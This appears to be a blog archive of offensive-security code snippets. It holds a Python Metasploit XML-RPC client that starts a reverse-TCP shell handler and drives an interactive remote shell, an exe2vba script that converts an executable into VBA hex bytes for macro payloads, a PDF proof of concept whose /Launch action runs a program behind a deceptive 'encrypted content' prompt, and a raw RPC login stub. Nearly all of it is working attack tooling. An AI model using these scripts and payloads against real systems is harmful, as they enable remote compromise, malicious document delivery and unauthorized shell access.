Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
"""Handles an transaction to the MetasploitXML-RPC server."""

# client identifier (may be overridden)
def __init__(self, use_datetime=0):
self._use_datetime = use_datetime
def request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
c = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
self.send_content(c, request_body)
self.verbose = verbose
return self._parse_response(None, c)

def make_connection(self, host):
import socket
addr = host.split(":")
inetaddr = (addr[0],int(addr[1]))
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(inetaddr)
return c
def send_content(self, connection, request_body):
if request_body:
connection.send(request_body + "\0")
def _parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
if not response:
break
if response.endswith("\0") :
response = response.rstrip("\0\n")
p.feed(response.encode("utf-8"))
break;
else:
p.feed(response.encode("utf-8"))

if file:
file.close()
p.close()

return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
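msftransport = MSFTransport()
# Plain TCP to msfrpcd: nothing on this channel is encrypted, which is why
# the default only makes sense against a loopback listener.
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

# Credentials are hard-coded; they must match what msfrpcd was started with.
ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
    token = ret['token']
else:
    # Everything below needs `token`; stopping here replaces the NameError
    # the script would otherwise die with on the next RPC call.
    print "Could not login\n"
    raise SystemExit(1)

opts = {
    "RHOST" : "192.168.1.1",
    "LHOST" : "127.0.0.1",
    "LPORT" : 4444,
    "PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
    print "Exploit sucessful...waiting on session"
    # The original's indentation is lost; the wait is taken as part of the
    # success branch, since there is nothing to wait for otherwise.
    sleep(25)
session_list = proxy.session.list(token)
x = session_list.keys()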

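def s_io(s):
    """Interactive read/write loop over Metasploit shell session `s` (an int id).

    Reads a line from the terminal, sends it to the session and prints what
    came back.  Typing "exit", or hitting EOF (Ctrl-D), ends the loop locally
    without closing the remote session.  Uses the module-level `proxy`,
    `token` and `base64`.
    """
    while True:
        try:
            line = raw_input("shell> ")
        except EOFError:
            # Leave cleanly instead of dying with a traceback on Ctrl-D.
            break
        if line == "exit":
            break
        # The RPC API carries shell I/O base64-encoded in both directions.
        proxy.session.shell_write(token, s, base64.b64encode(line + "\n"))
        read = proxy.session.shell_read(token, s)
        print base64.b64decode(read['data'])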

# Drive the first listed session, but only when it is a plain shell.
if session_list:
    first_id = x[0]
    if session_list[first_id]['type'] == 'shell':
        s = int(first_id)
        s_io(s)

Friday, April 30, 2010

exe2vba.py

import struct
import os
import binascii
import win32com.client
import time

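idx = 0
n = 0          # unused, kept for compatibility with the original script
maxbytes = 2000  # unused, kept for compatibility with the original script
payload_vba_file = "payload.vba"

exe_name = "putty.exe"
size = os.path.getsize(exe_name)
# 'rb' matters: the default text mode on Windows (where the imported win32com
# lives) translates line endings and treats ^Z as end-of-file, so a binary
# read in text mode silently corrupts or truncates the output.  Reading the
# file once also replaces the per-byte seek()/read(1) of the original.
with open(exe_name, 'rb') as exe:
    raw = exe.read()
exe_bytes = []
print "Writing Document ",
while (idx < size):
    c = binascii.b2a_hex(raw[idx])
    exe_bytes.append("&H%2s" % c.upper())
    idx = idx + 1
    # Progress animation: alternate X and O every 1000 bytes.
    if (idx%2000 == 0):
        print "\bX\b",
        time.sleep(.1)
    if (idx%2000 == 1000):
        print "\bO\b",
        time.sleep(.1)
# One join instead of repeated string concatenation in the loop.
final_bytes = "".join(exe_bytes)
print final_bytes
with open(payload_vba_file,'w') as fh:
    fh.write(final_bytes)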

Wednesday, March 31, 2010

PDF: execute code without JavaScript

example code from http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj

2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj

3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj

4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (calc.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF

Friday, December 04, 2009

metasploit xmlrpc stub

# xmlrpc interface to metasploit

import xmlrpclib
import socket
import telnetlib
from xml.dom import minidom

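# Hand-rolled auth.login round trip.  Credentials are hard-coded and the
# channel is plain TCP, so this belongs only against a loopback msfrpcd.
tn = telnetlib.Telnet("127.0.0.1",55553)
s = tn.get_socket()

params = ( 'msf', 'test' )

xmlrpccall = xmlrpclib.dumps(params, 'auth.login',None,'UTF-8')
# msfrpcd takes the request as a single line terminated by a NUL byte.
i = xmlrpccall.replace('\n','')

tn.write(i+"\n\0")
# A single recv() may return only part of the reply; keep reading until the
# NUL terminator arrives (or the peer closes).
chunks = []
while True:
    chunk = s.recv(2048)
    if not chunk:
        break
    chunks.append(chunk)
    if chunk.endswith('\0'):
        break
data = "".join(chunks)
tn.close()

data = data.replace('\n\0','')
n = minidom.parseString(data)


print n.toxml()
print n.childNodes[0].toxml()
# Walk methodResponse > params > param > value > struct > member[1] > value >
# <type> and print its text.  The second struct member is presumably the
# login token (the login handling elsewhere on this page reads ret['token']);
# an error reply has a different layout and this walk then raises IndexError.
node = n
for index in (0, 0, 0, 0, 0, 1, 1, 0):
    node = node.childNodes[index]
print node.firstChild.data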